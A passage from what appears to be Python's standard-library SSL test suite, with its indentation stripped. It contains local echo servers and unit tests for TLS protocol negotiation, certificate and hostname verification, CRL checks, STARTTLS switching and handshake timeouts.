elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ssl.SSLError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except socket.error, err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accept(self):
sock_obj, addr = self.accept()
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with closing(client_context.wrap_socket(socket.socket(),
server_hostname=sni_name)) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except socket.error as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaisesRegexp(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="localhost")) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="invalid")) as s:
with self.assertRaisesRegexp(ssl.CertificateError,
"hostname 'invalid' doesn't match u?'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(socket.socket()) as s:
with self.assertRaisesRegexp(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
closing(socket.socket()) as sock, \
closing(ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except socket.error as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with closing(socket.socket()) as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except socket.error:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except socket.error as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib2.urlopen(url, context=context)
try:
dlen = f.info().getheader("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = u"PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
s.write(b"over\n")
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = [None]
peer = [None]
def serve():
server.listen(5)
# Block on the accept and wait on the connection to close.
evt.set()
remote[0], peer[0] = server.accept()
remote[0].recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote[0].close()
server.close()
# Sanity checks.
self.assertIsInstance(remote[0], ssl.SSLSocket)
self.assertEqual(peer[0], client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
